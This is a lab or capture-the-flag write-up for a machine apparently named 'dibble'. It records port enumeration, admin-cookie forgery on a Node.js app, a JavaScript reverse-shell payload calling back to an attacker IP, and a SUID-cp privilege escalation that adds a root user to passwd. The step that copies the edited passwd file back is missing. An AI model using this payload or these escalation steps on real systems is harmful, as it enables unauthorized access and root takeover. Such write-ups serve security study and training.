Information Gathering (Enumeration)
Initial rustscan shows 5 ports open.
Port 21
- vsftpd 3.0.3
No known exploits for this, but whenever I see this service at this version there is a possibility of LFI.
- Try uploading file.
- try Anonymous login
- try admin login
- try to find a file if access to some directory is provided.
- see if its the database for webserver.
- ftp bruteforce
- The server hangs after connecting with an anonymous login. The likely reason is that in FTP the control connection is separate from the data connection, and a firewall is blocking the data connection.
- Check after getting root what the problem with FTP is.
Port 22
- OpenSSH 8.3 (protocol 2.0)
No known exploits for this.
- Still check Exploit DB for this version.
- SSH bruteforce (pending).
Port 80
- Apache httpd 2.4.46 ((Fedora))
- Drupal 9
I haven't encountered any exploits yet for this particular version. Nmap also shows Drupal 9 running.
- nikto
- feroxbuster
- view page source code
- upload functionality
- droopescan
| http-robots.txt: 22 disallowed entries
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
| /index.php/comment/reply/ /index.php/filter/tips /index.php/node/add/
| /index.php/search/ /index.php/user/password/ /index.php/user/register/
|_/index.php/user/login/ /index.php/user/logout/
Nikto
└─$ nikto -host 192.168.230.110 -port 80 | tee log.80.nikto.$(date +%s)
+ /: Retrieved x-powered-by header: PHP/7.4.10.
+ Entries from /robots.txt: /filter/tips/, /index.php/user/register/, /user/password/, /user/register/, /index.php/user/password/, /README.txt, /core/, /profiles/, /user/login/
+ OPTIONS: Allowed HTTP Methods: GET, POST .
+ /web.config: ASP config file is accessible.
+ /icons/: Directory indexing found.
+ /INSTALL.txt: Default file found.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /sites/: Directory indexing found.
+ /composer.json: PHP Composer configuration file reveals configuration information. See: https://getcomposer.org/
+ /composer.lock: PHP Composer configuration file reveals configuration information. See: https://getcomposer.org/
+ /core/modules/config/config.info.yml: Drupal version number revealed in config.info.yml.
+ /core/CHANGELOG.txt: Drupal version number revealed in CHANGELOG.txt.
Droopescan
droopescan scan drupal -u 192.168.230.110 -t 32
[+] Themes found:
gin http://192.168.230.110/themes/gin/
http://192.168.230.110/themes/gin/README.md
http://192.168.230.110/themes/gin/LICENSE.txt
[+] Possible version(s):
9.0.6
9.0.7
[+] Possible interesting urls found:
Default admin - http://192.168.230.110/user/login
Port 3000
- Node.js running (Express middleware)
Port 37017
- MongoDB 4.2.9
- Exploit DB
Node.js (3000)
http://192.168.249.110:3000/auth/register
Let's create a test account and look at the cookie.

Decode the cookie: first URL-decode it, then base64-decode it. The decoded value contains the type `default`. Change it to `admin` and re-encode: first base64, then URL-encode. Paste the modified cookie back and refresh the page.
Visit http://192.168.249.110:3000/logs
Create a new log

If we look at the logs:

We see a Javascript vulnerability. Let’s use it.
javascript shell
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/bash", []);
    var client = new net.Socket();
    client.connect(21, "192.168.49.248", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/;
})();
When we paste this payload and register it, we get a shell. Upgrade it to a proper TTY:
python3 -c 'import pty;pty.spawn("/bin/bash");'
stty raw -echo ; fg
$ reset
- Privesc (cp)
[benjamin@dibble app]$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/fusermount
/usr/bin/cp
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chage
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/newgrp
/usr/sbin/grub2-set-bootflag
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
cp and umount are the highlighted entries; cp is the one used for the privesc below.
Add a new user
[benjamin@dibble app]$ openssl passwd pass1234
NTOdsvj8zdrXs
[benjamin@dibble app]$ echo "root2:NTOdsvj8zdrXs:0:0:root:/root:/bin/bash" >> passwd.bak
(NTOdsvj8zdrXs is the crypt hash of pass1234.)
Root
[benjamin@dibble app]$ su root2
Password:
[root@dibble app]# whoami
root